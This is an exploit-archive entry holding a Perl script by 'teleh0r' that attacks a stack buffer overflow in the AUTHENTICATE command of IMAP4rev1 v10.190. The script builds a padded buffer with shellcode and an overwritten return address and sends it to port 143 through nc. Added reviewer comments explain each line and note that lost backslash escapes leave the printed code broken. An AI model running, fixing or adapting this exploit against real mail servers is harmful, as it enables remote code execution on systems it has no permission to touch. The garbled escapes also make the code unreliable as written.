
# Title : IMAP4rev1 10.190 Authentication Stack Overflow Exploit
# Published : 2001-01-19
# Author : teleh0r


#!/usr/bin/perl

## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: teleh0r@doglover.com / anno 2000
##
## This is nothing new - just wrote it for fun.
##
## Reviewer notes: the script assembles one fixed-length IMAP AUTHENTICATE
## line (padding, a payload literal, then a repeated 32-bit value) and hands
## it to `nc` through the shell.  As reproduced on this page a number of
## backslash escapes have been lost (see the per-line notes), so the text
## below does not parse exactly as the author wrote it.  There is no
## `use strict`/`use warnings`; every variable is an undeclared package global.

# Payload literal.  As printed here each "\x" escape has lost its backslash,
# so this is a seven-chunk plain-ASCII string ("xebx35..."), not raw bytes;
# length($shellcode) below therefore counts the visible characters.
$shellcode = "xebx35x5ex80x46x01x30x80x46x02x30x80".
             "x46x03x30x80x46x05x30x80x46x06x30x89".
             "xf0x89x46x08x31xc0x88x46x07x89x46x0c".
             "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80".
             "x31xdbx89xd8x40xcdx80xe8xc6xffxffxff".
             "x2fx32x39x3ex2fx43x38";


$len = 1052;       # Sufficient to overwrite the return value.
$nop = A;          # Using A/0x41 as nops to try to fool IDS.
                   # `A` is a bareword; without `use strict` it evaluates to
                   # the string "A" (a compile error under strict).
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.

# Usage check: exactly two positional arguments are expected.  The trailing
# "n" in the message is presumably a "\n" whose backslash was lost.
if (@ARGV < 2) {
    print("Usage: $0 <target> <offset>n");
    exit(1);
}

# $target is later interpolated verbatim into a shell command line (see the
# system() call at the bottom); $offset is used numerically in pack() below,
# where a non-numeric string silently becomes 0.
($target, $offset) = @ARGV;

# Padding: append $nop until the buffer holds ($len - length($shellcode) - 100)
# characters.  $i keeps that count after the loop.
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;
# pack 'l' emits a signed 32-bit integer in the host's native byte order.
$new_ret = pack('l', ($ret + $offset));

# Fill the remaining 100 characters (from $len - 100 up to $len) with the
# packed value, four bytes per iteration.
for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

# "{$len}" interpolates to "{1052}" (the braces are literal).  The "1512" and
# "12" sequences look like octal "\15\12" (CR LF) with the backslashes lost.
$exploit_string = "* AUTHENTICATE {$len}1512$buffer12";

# Single-string system() runs via /bin/sh.  As printed here the inner double
# quotes around $exploit_string are unescaped and terminate the Perl string
# early, which is a syntax error.  $target is unquoted inside the shell
# command, `echo -e` behaviour varies between shells, and `(... ; cat)` keeps
# nc's stdin open after the line is written.
system("(echo -e "$exploit_string" ; cat) | nc $target 143");

